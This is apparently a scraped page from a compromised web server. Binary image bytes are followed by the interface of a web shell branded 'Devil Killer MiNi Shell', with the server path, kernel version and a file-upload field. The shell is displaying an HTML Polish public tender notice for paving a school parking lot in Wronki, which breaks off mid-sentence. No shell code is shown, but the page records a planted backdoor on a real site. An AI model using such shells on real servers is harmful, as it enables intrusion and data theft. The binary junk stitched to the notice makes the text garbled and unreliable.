JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210607/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210607/0007375001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00073750 z dnia 2021-06-07</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utwardzenie parkingu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół nr 1 im. Powstańców Wielkopolskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000767428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Leśna 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wronki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-510</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 672540213</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@szkolanalesnej.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szkolanalesnej.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utwardzenie parkingu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d903b27e-c76e-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00073750</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00035358/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Utwardzenie parkingu przed szkołą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.szkolanalesnej.edu.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal - Adres ESP (skrytki ePUAP):<br/>/ZSLesna/SkrytkaESP oraz poczty elektronicznej: sekretariat@szkolanalesnej.edu.pl2) Zamawiający<br/>wyznacza następujące osoby do kontaktu z Wykonawcami w sprawach formalnych: Monika Kozber,<br/>tel. +48 672540213, email: sekretariat@szkolanalesnej.edu.pl3) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do<br/>złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.4) Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).5) Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza<br/>do komunikacji” wynosi 150 MB.6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na ePUAP.7) Niniejsze postępowanie można wyszukać<br/>również na Liście wszystkich postępowań w systemie miniportal<br/>(https://miniportal.uzp.gov.pl/Postepowania) na liście wszystkich postępowań w miniPortalu, klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.8) Uwaga! Przed<br/>przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją<br/>korzystania z miniportal i ePuap - stanowiącej zał. nr 6 do SWZ. Instrukcja została zamieszona także<br/>bezpośrednio na portalu (https://miniportal.uzp.gov.pl/Instrukcje).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi;2)<br/>Administratorem Pani/Pana danych osobowych jest Zespół Szkół Nr 1 im. Powstańców Wielkopolskich<br/>we Wronkach ul. Leśna 17, 64-510 Wronki, e-mail sekretariat@szkolanalesnej.edu.pl, tel. +48<br/>672540213, www.szkolanalesnej.edu.pl, NIP: 787-20-93-967, tel: 67 254 02 13, godz. do kontaktu:<br/>poniedziałek – piątek od 8:00 do 15:00,3) inspektorem ochrony danych osobowych w Zespole Szkół Nr<br/>1 im. Powstańców Wielkopolskich we Wronkach jest Pani Małgorzata Śrama, e-mail:<br/>sekretariat@szkolanalesnej.edu.pl , tel.: 67 25402134) Dane osobowe wykonawcy będą przetwarzane<br/>na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o<br/>udzielenie zamówienia publicznego pn.: „Utwardzenie parkingu” (nr postępowania: ZSNr1-<br/>ZP.271.1.2021);5) Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych, jak również inne podmioty upoważnione do odbioru<br/>danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym<br/>podmioty zajmujące się obsługą informatyczną Administratora;6) Dane osobowe wykonawcy zawarte<br/>w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy; Z uwagi na brak miejsca - ograniczona ilość znaków (liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią:<br/>http://bip.szkolanalesnej.edu.pl/</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:− na podstawie<br/>art.15RODOprawodostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art.<br/>16RODOprawodosprostowania Pani/Pana danych osobowych **;− na podstawie art. 18<br/>RODOprawożądaniaodadministratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniemprzypadków,októrychmowa w art. 18 ust. 2 RODO ***;− prawo do wniesienia skargi do<br/>PrezesaUrzęduOchronyDanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowychPani/Panadotyczącychnaruszaprzepisy RODO;Nie przysługuje Pani/Panu:− w związku z<br/>art. 17 ust. 3lit. b, d lube RODOprawo dousunięcia danych osobowych;− prawo do przenoszenia<br/>danychosobowych, o którymmowa wart. 20RODO;− na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobecprzetwarzaniadanychosobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych<br/>osobowychjest art. 6 ust.1 lit. cRODO. **Wyjaśnienie: skorzystanie z prawa do sprostowania nie<br/>możeskutkowaćzmianąwynikupostępowaniao udzielenie zamówienia publicznego ani zmianą<br/>postanowieńumowywzakresieniezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołuorazjegozałączników.***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma<br/>zastosowaniawodniesieniudoprzechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lubwceluochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względyinteresupublicznego Unii Europejskiej lub państwa członkowskiego. Z uwagi na brak miejsca - ograniczona ilość znaków (liter) -<br/>szczegółowe informacje zawarto w SWZ. Prosimy o zapoznanie się z treścią:<br/>http://bip.szkolanalesnej.edu.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSNr1-ZP.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 196563,42 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiot zamówienia stanowi: Utwardzenie parkingu .Zamawiający wymaga aby przedmiot<br/>umowy był wykonany w sposób gwarantujący dostępność dla osób niepełnosprawnych.<br/>Szczegółowy opis przedmiotu zamówienia zawiera OPZ – Załącznik do SWZ nr: 1a (Projekt), 1b<br/>(STWiORB), 1c (Przedmiar), 1d (Mapa do celów projektowych, 1e (Detale), 1f (Mapa do celów<br/>projektowych).Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki Wykonawcy<br/>wymienione w projekcie umowy.Płatność dokonana będzie w złotych w terminie do 30 dni od<br/>daty wydania Zamawiającemu przedmiotu umowy i dostarczenia faktury, na konto bankowe<br/>Wykonawcy wskazane w fakturze. Podstawą do wystawienia faktury jest podpisany przez<br/>zamawiającego protokół odbioru (bez uwag).Zamawiający zamierza przeznaczyć na realizację<br/>zamówienia kwotę do 241773,01 zł.2) Gwarancja i rękojmia: minimalne warunki gwarancji i rękojmi na przedmiot zamówienia: 3 lata od dnia odbioru przedmiotu zamówienia (podlega ocenie w kryteriach oceny ofert)<br/>Zamawiający na podstawie art. 95 uPzp ustanawia wymóg w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności <br/>w zakresie realizacji zamówienia.<br/>Wykonawca lub podwykonawca winien do realizacji umowy skierować zatrudnione w wymiarze pełnego etatu na podstawie umowy o pracę osoby, które będą wykonywać pracę w sposób kreślony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy w zakresie czynności: prace fizyczne. Wykonawca lub podwykonawca, najpóźniej w dniu podpisania umowy w niniejszym przedmiocie, winien złożyć stosownej treści oświadczenie.<br/>Zamawiający zastrzega prawo do weryfikacji sposobu zatrudnienia ww. osób poprzez wezwanie Wykonawcy lub podwykonawcy do złożenia odpowiednio oświadczenia oraz poprzez bezpośrednie rozmowy z osobami wykonującymi ww. czynności. W przypadku wykonywania ww. czynności przez osoby niezatrudnione zgodnie z art. 22 § 1 KP Zamawiający nałoży kary umowne <br/>w wysokości 1500 zł za każdy ujawniony przypadek. W przypadku stwierdzenia, pomimo wezwania, że osoby wykonujące roboty nie są zatrudnione zgodnie z SWZ, Zamawiający zastrzega możliwość natychmiastowego rozwiązania umowy z winy wykonawcy. Szczegółowe zapisy zawarto <br/>w projekcie umowy – Zał. nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta,<br/>odpowiadającawszystkimwarunkom określonym w dokumentach zamówienia, która uzyska największą<br/>łączną liczbę punktów.Oferta, która przedstawi najkorzystniejszy bilans wg przyjętych kryteriów, a tym<br/>samym otrzymanajwiększą łączną liczbę punktów, zostanie uznana za najkorzystniejszą. Pozostałe<br/>oferty zostanąsklasyfikowane zgodnie z ilością uzyskanych punktów. Jeżeli nie można wybrać<br/>najkorzystniejszejoferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i<br/>innych kryteriów ocenyofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą<br/>ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryteriumo<br/>najwyższej wadze,zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można dokonaćwyboru<br/>oferty w sposób, októrym mowa w pkt 2, zamawiający wzywa wykonawców, którzy złożyli teoferty, do<br/>złożenia w terminieokreślonym przez zamawiającego ofert dodatkowych zawierających nowącenę lub<br/>koszt. Wykonawcy,składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w<br/>uprzednio złożonychprzez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty<br/>wezwiewykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>niekrótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych<br/>środkówdowodowych:1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o<br/>brakuprzynależności do tej samej grupy kapitałowej z innym Wykonawcą, który złożył odrębną ofertę,<br/>ofertęczęściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dowodamipotwierdzającymi, że przygotowanie oferty, oferty częściowej nastąpiło niezależnie od<br/>Wykonawcynależącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ. Oświadczenie musi<br/>być złożone w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej<br/>opatrzonejpodpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla<br/>formy organizacyjnej lub innym dokumencie.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy 2. Wykaz rozwiązań równoważnych - jeżeli<br/>dotyczy3.Zastrzeżenietajemnicy przedsiębiorstwa - jeżeli dotyczy- w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. 4.<br/>Pełnomocnictwo - jeżeli dotyczy; Pełnomocnictwo powinno zostać złożone w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej<br/>za zgodność z oryginałem przeznotariusza, tj. podpisanej kwalifikowanym podpisem<br/>elektronicznym osoby posiadającej uprawnienia notariusza. Zgodnie z art. 97 § 2 ustawy z 14<br/>lutego 1991 r. – Prawo o notariacie, elektroniczne poświadczenie zgodności odpisu, wyciągu lub<br/>kopii z okazanym dokumentem notariusz opatruje kwalifikowanym podpisem elektronicznym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców ubiegających się wspólnie<br/>oudzieleniezamówieniawykonawcyzobowiązani są do ustanowienia<br/>pełnomocnika.Dokumentpełnomocnictwa, z treściktóregobędzie wynikało umocowanie do<br/>reprezentowaniawpostępowaniu o udzieleniezamówienia tychwykonawców należy załączyć<br/>dooferty.Pełnomocnictwo powinno byćzałączone do oferty ipowinno zawierać<br/>wszczególnościwskazanie:- postępowania ozamówienie publiczne, któregodotyczy,-<br/>wszystkichwykonawcówubiegających się wspólnie oudzielenie zamówieniawymienionych z<br/>nazwy zokreśleniem adresusiedziby,- ustanowionegopełnomocnika orazzakresu<br/>jegoumocowania.Wymaganaforma:Pełnomocnictwo powinnozostać złożone w<br/>formieelektronicznejlub w postacielektronicznej opatrzonej podpisemzaufanym, lub<br/>podpisemosobistym.Dopuszczasię równieżprzedłożenie elektronicznej kopiidokumentu<br/>poświadczonejza zgodność z oryginałemprzeznotariusza, tj. podpisanejkwalifikowanym<br/>podpisemelektronicznym osobyposiadającejuprawnienia notariusza. Zgodnie zart. 97 § 2 ustawy<br/>z 14lutego 1991 r. – Prawo onotariacie,elektroniczne poświadczeniezgodności odpisu, wyciągu<br/>lubkopii z okazanymdokumentemnotariusz opatruje kwalifikowanympodpisem elektronicznym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności. 2.<br/>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej<br/>jednej z 